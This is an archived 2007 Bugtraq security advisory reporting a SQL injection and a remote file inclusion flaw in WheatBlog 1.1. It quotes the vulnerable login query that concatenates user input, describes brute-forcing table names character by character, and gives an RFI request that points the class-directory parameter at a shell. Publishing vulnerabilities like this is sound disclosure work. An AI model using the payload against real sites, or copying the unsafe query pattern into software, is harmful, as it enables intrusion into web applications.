[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: WheatBlog 1.1 RFI/SQL Injection
From: underwater () itdefence ! ru
Date: 2007-06-30 14:52:04
Message-ID: 20070630145204.28681.qmail () securityfocus ! com
[Download RAW message or body]
Found by E.Minaev (underwater@itdefence.ru)
ITDefence.ru
1) SQL Injection in login function. With help of this injection is possible to make \
per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured \
off).
------------------------------------------
"$sql = "select * from $tblUsers where login = '$login'";
if ( $login != $row['login'] ) $valid_user = 0;
if ( $password != $row['password'] ) $valid_user = 0;"
------------------------------------------
2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic